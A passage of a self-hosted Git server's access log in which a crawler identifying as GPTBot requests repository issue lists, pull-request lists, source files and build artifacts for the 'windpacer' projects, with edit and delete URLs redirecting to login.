"/windpacer/dbserver/_new/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:18:59:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" +[17/Feb/2026:18:59:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:18:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:18:59:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:18:59:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" +[17/Feb/2026:18:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/localpycs/struct.pyc" +[17/Feb/2026:18:59:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll?display=rendered" [Client 74.7.227.38] [Length 11073] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/libcrypto-3-x64.dll" +[17/Feb/2026:18:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:59:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10045] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=recentupdate&state=open&type=all" +[17/Feb/2026:18:59:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10214] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:59:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:00:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 554790] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full" +[17/Feb/2026:19:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=closed&type=all" +[17/Feb/2026:19:00:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=closed&type=all" +[17/Feb/2026:19:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?milestone=-1&state=open&type=all" +[17/Feb/2026:19:00:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9994] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&project=-1&state=open&type=all" +[17/Feb/2026:19:00:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10068] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:00:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10069] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:00:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10070] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:00:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10063] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" +[17/Feb/2026:19:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=source" [Client 74.7.227.38] [Length 554808] [Gzip 19.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:00:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html?display=rendered" [Client 74.7.227.38] [Length 11185] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:00:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:00:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:00:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:00:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 9824] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 846224] [Gzip 27.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 958759] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" [Client 74.7.227.38] [Length 936] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10242] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10074] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:19:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:19:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" +[17/Feb/2026:19:00:25 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/-" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/xref-gold_monitor_full.html" +[17/Feb/2026:19:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10012] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10200] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:19:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11302] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:19:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11304] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:19:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=closed&type=all" +[17/Feb/2026:19:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?milestone=-1&state=closed&type=all" +[17/Feb/2026:19:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&state=closed&type=all" [Client 74.7.227.38] [Length 10161] 